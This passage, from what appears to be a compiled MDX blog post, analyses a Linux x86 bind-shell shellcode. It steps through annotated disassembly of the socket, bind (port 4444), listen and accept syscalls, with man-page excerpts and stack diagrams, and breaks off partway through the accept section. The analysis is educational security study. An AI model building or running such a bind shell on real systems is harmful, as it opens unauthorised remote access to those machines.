\"className\": \"token macro property\"\n  }), \"#\", mdx(\"span\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"token directive keyword\"\n  }), \"define\"), \" SYS_LISTEN      4       \"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token comment\"\n  }), \"/* sys_listen(2) */\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token macro property\"\n  }), \"#\", mdx(\"span\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"token directive keyword\"\n  }), \"define\"), \" SYS_ACCEPT      5       \"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token comment\"\n  }), \"/* sys_accept(2) */\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token macro property\"\n  }), \"#\", mdx(\"span\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"token directive keyword\"\n  }), \"define\"), \" SYS_GETSOCKNAME 6       \"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token comment\"\n  }), \"/* sys_getsockname(2) */\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token macro property\"\n  }), \"#\", mdx(\"span\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"token directive keyword\"\n  }), \"define\"), \" SYS_GETPEERNAME 7       \"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token comment\"\n  }), \"/* sys_getpeername(2) */\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token macro property\"\n  }), \"#\", mdx(\"span\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"token directive keyword\"\n  }), \"define\"), \" SYS_SOCKETPAIR  8       \"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token comment\"\n  }), \"/* 
sys_socketpair(2) */\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token macro property\"\n  }), \"#\", mdx(\"span\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"token directive keyword\"\n  }), \"define\"), \" SYS_SEND        9       \"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token comment\"\n  }), \"/* sys_send(2) */\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token macro property\"\n  }), \"#\", mdx(\"span\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"token directive keyword\"\n  }), \"define\"), \" SYS_RECV        10      \"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token comment\"\n  }), \"/* sys_recv(2) */\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token macro property\"\n  }), \"#\", mdx(\"span\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"token directive keyword\"\n  }), \"define\"), \" SYS_SENDTO      11      \"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token comment\"\n  }), \"/* sys_sendto(2) */\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token macro property\"\n  }), \"#\", mdx(\"span\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"token directive keyword\"\n  }), \"define\"), \" SYS_RECVFROM    12      \"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token comment\"\n  }), \"/* sys_recvfrom(2) */\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token macro property\"\n  }), \"#\", mdx(\"span\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"token directive keyword\"\n  }), \"define\"), \" SYS_SHUTDOWN    13      \"), mdx(\"span\", _extends({\n 
   parentName: \"code\"\n  }, {\n    \"className\": \"token comment\"\n  }), \"/* sys_shutdown(2) */\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token macro property\"\n  }), \"#\", mdx(\"span\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"token directive keyword\"\n  }), \"define\"), \" SYS_SETSOCKOPT  14      \"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token comment\"\n  }), \"/* sys_setsockopt(2) */\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token macro property\"\n  }), \"#\", mdx(\"span\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"token directive keyword\"\n  }), \"define\"), \" SYS_GETSOCKOPT  15      \"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token comment\"\n  }), \"/* sys_getsockopt(2) */\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token macro property\"\n  }), \"#\", mdx(\"span\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"token directive keyword\"\n  }), \"define\"), \" SYS_SENDMSG     16      \"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token comment\"\n  }), \"/* sys_sendmsg(2) */\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token macro property\"\n  }), \"#\", mdx(\"span\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"token directive keyword\"\n  }), \"define\"), \" SYS_RECVMSG     17      \"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token comment\"\n  }), \"/* sys_recvmsg(2) */\")))), mdx(\"p\", null, \"Therefore, what this snippet actually does is invoking sub-function \", mdx(\"strong\", {\n    parentName: \"p\"\n  }, mdx(\"a\", _extends({\n    parentName: \"strong\"\n  }, {\n    \"href\": 
\"https://manpages.ubuntu.com/manpages/xenial/man2/socket.2.html\"\n  }), \"socket\")), \" function, with actual arguments consist of \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"0x2\"), \", \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"0x1\"), \" which stands for \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"AF_INET\"), \" and \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"SOCK_STREAM\"), \". After execution, this syscall return value is \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"0x3\"), \" a file descriptor, and stored in register \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"EAX\"), \".\"), mdx(\"p\", null, \"Synopsis of function socket:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"c\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-c\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-c\"\n  }), \"       \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token macro property\"\n  }), \"#\", mdx(\"span\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"token directive keyword\"\n  }), \"include\"), \" \", mdx(\"span\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"token string\"\n  }), \"<sys/types.h>\"), \"          \"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token comment\"\n  }), \"/* See NOTES */\"), \"\\n       \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token macro property\"\n  }), \"#\", mdx(\"span\", 
_extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"token directive keyword\"\n  }), \"include\"), \" \", mdx(\"span\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"token string\"\n  }), \"<sys/socket.h>\")), \"\\n\\n       \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token keyword\"\n  }), \"int\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token function\"\n  }), \"socket\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"(\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token keyword\"\n  }), \"int\"), \" domain\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \",\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token keyword\"\n  }), \"int\"), \" type\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \",\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token keyword\"\n  }), \"int\"), \" protocol\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \")\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \";\")))), mdx(\"p\", null, \"Possible return value:\"), mdx(\"blockquote\", null, mdx(\"p\", {\n    parentName: \"blockquote\"\n  }, \"On success, a file descriptor for the new socket is returned. 
On error, -1 is returned, and errno is set appropriately.\")), mdx(\"h3\", null, \"Bind() system call\"), mdx(\"p\", null, \"Assembly snippet 2:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"assembly\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-assembly\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-assembly\"\n  }), \"0x0804a04f <+15>:   pop    ebx        ; ebx now holds 0x2\\n0x0804a050 <+16>:   pop    esi        ; esi now holds 0x1\\n0x0804a051 <+17>:   push   edx        ; edx holds 0x0; this dword becomes sin_addr = 0.0.0.0 (INADDR_ANY), so the socket is bound on all interfaces\\n0x0804a052 <+18>:   push   0x5c110002 ; stored in memory as bytes 02 00 11 5c: sin_family = 0x0002 (AF_INET, little endian), sin_port = 0x115c (4444, network byte order)\\n0x0804a057 <+23>:   push   0x10       ; addrlen = 0x10 (16), the size of struct sockaddr_in\\n0x0804a059 <+25>:   push   ecx        ; push previous stack pointer (now pointing to 0x5c110002) onto the stack\\n0x0804a05a <+26>:   push   eax        ; push previous syscall return value onto the stack to save the file descriptor\\n0x0804a05b <+27>:   mov    ecx,esp    ; save current stack pointer to ecx\\n0x0804a05d <+29>:   push   0x66       ; push 0x66 (102) onto the stack\\n0x0804a05f <+31>:   pop    eax        ; pop 0x66 (102) off the stack and store it in register eax\\n0x0804a060 <+32>:   int    0x80\"))), mdx(\"p\", null, \"Again, since \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"EBX\"), \" holds \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"0x2\"), \", the function actually invoked is sub-function \", mdx(\"strong\", {\n    parentName: \"p\"\n  }, mdx(\"a\", _extends({\n    parentName: \"strong\"\n  }, {\n    \"href\": \"https://manpages.ubuntu.com/manpages/xenial/man2/bind.2.html\"\n  }), \"bind\")), \", and \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"ECX\"), \" holds the 
address of the other arguments.\"), mdx(\"p\", null, \"Synopsis from man page:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"c\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-c\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-c\"\n  }), \"   \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token keyword\"\n  }), \"int\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token function\"\n  }), \"bind\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"(\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token keyword\"\n  }), \"int\"), \" sockfd\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \",\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token keyword\"\n  }), \"const\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token keyword\"\n  }), \"struct\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token class-name\"\n  }), \"sockaddr\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \"*\"), \"addr\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \",\"), \"\\n            socklen_t addrlen\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \")\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \";\")))), mdx(\"p\", null, \"Possible return value:\"), mdx(\"blockquote\", null, mdx(\"p\", {\n    parentName: \"blockquote\"\n  }, 
\"On success, zero is returned. On error, -1 is returned, and errno is\\nset appropriately.\")), mdx(\"p\", null, \"Stack layout:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"assembly\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-assembly\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-assembly\"\n  }), \"               Address      Stack\\n                        +------------+\\n                ....    |    ....    |\\n                        +------------+\\nesp (ecx) \\u2014\\u25B8 0xbfffef54 | 0x00000003 | \\u25C2\\u2014 socket file descriptor                      [0]\\n                        +------------+\\n             0xbfffef58 | 0xbfffef60 | \\u25C2\\u2014 memory address of bind address (0x5c110002) [1] \\u2014\\u25B8 [3]\\n                        +------------+\\n             0xbfffef5c | 0x00000010 | \\u25C2\\u2014 length of address                           [2]\\n                        +------------+\\n             0xbfffef60 | 0x5c110002 | \\u25C2\\u2014 reference by 0xbfffef58                     [3]\\n                        +------------+\\n             0xbfffef64 | 0x00000000 |\\n                        +------------+\\n                ....    |    ....    
|\\n                        +------------+\"))), mdx(\"p\", null, \"Before calling syscall:\"), mdx(\"p\", null, mdx(\"span\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"gatsby-resp-image-wrapper\",\n    \"style\": {\n      \"position\": \"relative\",\n      \"display\": \"block\",\n      \"marginLeft\": \"auto\",\n      \"marginRight\": \"auto\",\n      \"maxWidth\": \"590px\"\n    }\n  }), \"\\n      \", mdx(\"a\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"gatsby-resp-image-link\",\n    \"href\": \"/static/ba4366106ff8411971014c0ff5c55c1b/d9199/2020-06-17_10-46.png\",\n    \"style\": {\n      \"display\": \"block\"\n    },\n    \"target\": \"_blank\",\n    \"rel\": \"noopener\"\n  }), \"\\n    \", mdx(\"span\", _extends({\n    parentName: \"a\"\n  }, {\n    \"className\": \"gatsby-resp-image-background-image\",\n    \"style\": {\n      \"paddingBottom\": \"70.94594594594594%\",\n      \"position\": \"relative\",\n      \"bottom\": \"0\",\n      \"left\": \"0\",\n      \"backgroundImage\": \"url('data:image/png;base64,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')\",\n      \"backgroundSize\": \"cover\",\n      \"display\": \"block\"\n    }\n  })), \"\\n  \", mdx(\"img\", _extends({\n    parentName: \"a\"\n  }, {\n    \"className\": \"gatsby-resp-image-image\",\n    \"alt\": \"sys_bind\",\n    \"title\": \"sys_bind\",\n    \"src\": \"/static/ba4366106ff8411971014c0ff5c55c1b/fcda8/2020-06-17_10-46.png\",\n    \"srcSet\": [\"/static/ba4366106ff8411971014c0ff5c55c1b/12f09/2020-06-17_10-46.png 148w\", \"/static/ba4366106ff8411971014c0ff5c55c1b/e4a3f/2020-06-17_10-46.png 295w\", \"/static/ba4366106ff8411971014c0ff5c55c1b/fcda8/2020-06-17_10-46.png 590w\", \"/static/ba4366106ff8411971014c0ff5c55c1b/efc66/2020-06-17_10-46.png 885w\", \"/static/ba4366106ff8411971014c0ff5c55c1b/d9199/2020-06-17_10-46.png 960w\"],\n    \"sizes\": \"(max-width: 590px) 100vw, 590px\",\n    \"style\": {\n      \"width\": \"100%\",\n      
\"height\": \"100%\",\n      \"margin\": \"0\",\n      \"verticalAlign\": \"middle\",\n      \"position\": \"absolute\",\n      \"top\": \"0\",\n      \"left\": \"0\"\n    },\n    \"loading\": \"lazy\"\n  })), \"\\n  \"), \"\\n    \")), mdx(\"p\", null, \"If nothing goes wrong, the content of register \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"EAX\"), \" will change to 0, indicate zero is returned. Now, socket successfully binds to port 4444, the next step is to set the listener handler to handle incoming connection.\"), mdx(\"h3\", null, \"Listen() system call\"), mdx(\"p\", null, \"Assembly snippet 3:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"assembly\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-assembly\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-assembly\"\n  }), \"0x0804a062 <+34>:   mov    DWORD PTR [ecx+0x4],eax ; eax holds 0x0, set stack address 0xbfffef58 to 0x00000000\\n0x0804a065 <+37>:   mov    bl,0x4                  ; set ebx to 0x4, perpare to invoke SYS_LISTEN(4)\\n0x0804a067 <+39>:   mov    al,0x66                 ; set sys_socketcall number\\n0x0804a069 <+41>:   int    0x80                    ; system interrupt - calling syscall\"))), mdx(\"p\", null, \"Register \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"EBX\"), \" set to 4, hence sub-function \", mdx(\"a\", _extends({\n    parentName: \"p\"\n  }, {\n    \"href\": \"https://manpages.ubuntu.com/manpages/xenial/man2/listen.2.html\"\n  }), \"listen\"), \" will be called.\"), mdx(\"p\", null, \"Synopsis of listen function:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"c\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-c\"\n  }), mdx(\"code\", 
_extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-c\"\n  }), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token keyword\"\n  }), \"int\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token function\"\n  }), \"listen\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"(\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token keyword\"\n  }), \"int\"), \" sockfd\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \",\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token keyword\"\n  }), \"int\"), \" backlog\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \")\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \";\")))), mdx(\"p\", null, \"Possible return value:\"), mdx(\"blockquote\", null, mdx(\"p\", {\n    parentName: \"blockquote\"\n  }, \"On success, zero is returned. 
On error, -1 is returned, and errno is set appropriately.\")), mdx(\"p\", null, \"Description:\"), mdx(\"blockquote\", null, mdx(\"p\", {\n    parentName: \"blockquote\"\n  }, \"listen() marks the socket referred to by sockfd as a passive socket, that is, as a socket that will be used to accept incoming connection requests using \", mdx(\"strong\", {\n    parentName: \"p\"\n  }, mdx(\"a\", _extends({\n    parentName: \"strong\"\n  }, {\n    \"href\": \"https://manpages.ubuntu.com/manpages/xenial/man2/accept.2.html\"\n  }), \"accept(2)\")), \".\"), mdx(\"p\", {\n    parentName: \"blockquote\"\n  }, \"The sockfd argument is a file descriptor that refers to a socket of type \", mdx(\"strong\", {\n    parentName: \"p\"\n  }, \"SOCK_STREAM\"), \" or \", mdx(\"strong\", {\n    parentName: \"p\"\n  }, \"SOCK_SEQPACKET\"), \".\"), mdx(\"p\", {\n    parentName: \"blockquote\"\n  }, \"The backlog argument defines the maximum length to which the queue of pending connections for sockfd may grow. If a connection request arrives when the queue is full, the client may receive an error with an indication of \", mdx(\"strong\", {\n    parentName: \"p\"\n  }, \"ECONNREFUSED\"), \" or, if the underlying protocol supports retransmission, the request may be ignored so that a later reattempt at connection succeeds.\")), mdx(\"p\", null, \"Stack layout:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"assembly\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-assembly\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-assembly\"\n  }), \"               Address      Stack\\n                        +------------+\\n                ....    |    ....    
|\\n                        +------------+\\nesp (ecx) \\u2014\\u25B8 0xbfffef54 | 0x00000003 | \\u25C2\\u2014 socket file descriptor [0]\\n                        +------------+\\n[ecx+0x4] \\u2014\\u25B8 0xbfffef58 | 0x00000000 | \\u25C2\\u2014 backlog                [1]\\n                        +------------+\\n             0xbfffef5c | 0x00000010 |\\n                        +------------+\\n             0xbfffef60 | 0x5c110002 |\\n                        +------------+\\n             0xbfffef64 | 0x00000000 |\\n                        +------------+\\n                ....    |    ....    |\\n                        +------------+\"))), mdx(\"h3\", null, \"Accept() system call\"), mdx(\"p\", null, \"Assembly snippet 4:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"assembly\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-assembly\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-assembly\"\n  }), \"0x0804a06b <+43>:   inc    ebx     ; increment ebx by 1, giving 5, which stands for SYS_ACCEPT(5)\\n0x0804a06c <+44>:   mov    al,0x66 ; again the sys_socketcall number\\n0x0804a06e <+46>:   int    0x80    ; invoke syscall and block waiting for a connection; ecx is unchanged, so sockfd = 0x3 and addr = NULL (the 0x0 stored at [ecx+0x4] before listen)\"))), mdx(\"p\", null, \"Register \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"EBX\"), \" is incremented to 5; therefore, sub-function \", mdx(\"a\", _extends({\n    parentName: \"p\"\n  }, {\n    \"href\": \"https://manpages.ubuntu.com/manpages/xenial/man2/accept.2.html\"\n  }), \"accept\"), \" is called.\"), mdx(\"p\", null, \"Definition of accept function:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"c\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-c\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": 
\"language-c\"\n  }), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token keyword\"\n  }), \"int\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token function\"\n  }), \"accept\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"(\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token keyword\"\n  }), \"int\"), \" sockfd\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \",\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token keyword\"\n  }), \"struct\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token class-name\"\n  }), \"sockaddr\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \"*\"), \"addr\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \",\"), \" socklen_t \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \"*\"), \"addrlen\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \")\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \";\")))), mdx(\"p\", null, \"Possible return value:\"), mdx(\"blockquote\", null, mdx(\"p\", {\n    parentName: \"blockquote\"\n  }, \"On success, these system calls return a nonnegative integer that is a descriptor for the accepted socket. 
On error, -1 is returned, and errno is set appropriately.\")), mdx(\"p\", null, \"Description:\"), mdx(\"blockquote\", null, mdx(\"p\", {\n    parentName: \"blockquote\"\n  }, \"The \", mdx(\"strong\", {\n    parentName: \"p\"\n  }, mdx(\"a\", _extends({\n    parentName: \"strong\"\n  }, {\n    \"href\": \"https://manpages.ubuntu.com/manpages/xenial/man2/accept.2.html\"\n  }), \"accept()\")), \" system call is used with connection-based socket types (SOCK_STREAM, SOCK_SEQPACKET). It extracts the first connection request on the queue of pending connections for the listening socket, sockfd, creates a new connected socket, and returns a new file descriptor referring to that socket. The newly created socket is not in the listening state. The original socket sockfd is unaffected by this call.\"), mdx(\"p\", {\n    parentName: \"blockquote\"\n  }, \"The argument sockfd is a socket that has been created with \", mdx(\"strong\", {\n    parentName: \"p\"\n  }, mdx(\"a\", _extends({\n    parentName: \"strong\"\n  }, {\n    \"href\": \"https://manpages.ubuntu.com/manpages/xenial/man2/socket.2.html\"\n  }), \"socket(2)\")), \", bound to a local address with \", mdx(\"strong\", {\n    parentName: \"p\"\n  }, mdx(\"a\", _extends({\n    parentName: \"strong\"\n  }, {\n    \"href\": \"https://manpages.ubuntu.com/manpages/xenial/man2/bind.2.html\"\n  }), \"bind(2)\")), \", and is listening for connections after a \", mdx(\"strong\", {\n    parentName: \"p\"\n  }, mdx(\"a\", _extends({\n    parentName: \"strong\"\n  }, {\n    \"href\": \"https://manpages.ubuntu.com/manpages/xenial/man2/listen.2.html\"\n  }), \"listen(2)\")), \".\"), mdx(\"p\", {\n    parentName: \"blockquote\"\n  }, \"The argument addr is a pointer to a sockaddr structure. This structure is filled in with the address of the peer socket, as known to the communications layer. 
The exact format of the address returned addr is determined by the socket\\u2019s address family (see \", mdx(\"strong\", {\n    parentName: \"p\"\n  }, mdx(\"a\", _extends({\n    parentName: \"strong\"\n  }, {\n    \"href\": \"https://manpages.ubuntu.com/manpages/xenial/man2/socket.2.html\"\n  }), \"socket(2)\")), \" and the respective protocol man pages). When addr is NULL, nothing is filled in; in this case, addrlen is not used, and should also be NULL.\"), mdx(\"p\", {\n    parentName: \"blockquote\"\n  }, \"The addrlen argument is a value-result argument: the caller must initialize it to contain the size (in bytes) of the structure pointed to by addr; on return it will contain the actual size of the peer address.\"), mdx(\"p\", {\n    parentName: \"blockquote\"\n  }, \"The returned address is truncated if the buffer provided is too small; in this case, addrlen will return a value greater than was supplied to the call.\")), mdx(\"p\", null, \"Stack layout:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"assembly\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-assembly\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-assembly\"\n  }), \"               Address      Stack\\n                        +------------+\\n                ....    |    ....    
|\\n                        +------------+\\nesp (ecx) \\u2014\\u25B8 0xbfffef54 | 0x00000003 | \\u25C2\\u2014 socket file descriptor     [0]\\n                        +------------+\\n          \\u2014\\u25B8 0xbfffef58 | 0x00000000 | \\u25C2\\u2014 pointer point to sockaddr  [1]\\n                        +------------+\\n             0xbfffef5c | 0x00000010 | \\u25C2\\u2014 pointer point to socklen_t [2]\\n                        +------------+\\n             0xbfffef60 | 0x5c110002 |\\n                        +------------+\\n             0xbfffef64 | 0x00000000 |\\n                        +------------+\\n                ....    |    ....    |\\n                        +------------+\"))), mdx(\"p\", null, \"Before calling syscall:\"), mdx(\"p\", null, mdx(\"span\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"gatsby-resp-image-wrapper\",\n    \"style\": {\n      \"position\": \"relative\",\n      \"display\": \"block\",\n      \"marginLeft\": \"auto\",\n      \"marginRight\": \"auto\",\n      \"maxWidth\": \"590px\"\n    }\n  }), \"\\n      \", mdx(\"a\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"gatsby-resp-image-link\",\n    \"href\": \"/static/4cc43a25ce535d2d227d21c863ce0cb1/d9199/2020-06-17_22-02.png\",\n    \"style\": {\n      \"display\": \"block\"\n    },\n    \"target\": \"_blank\",\n    \"rel\": \"noopener\"\n  }), \"\\n    \", mdx(\"span\", _extends({\n    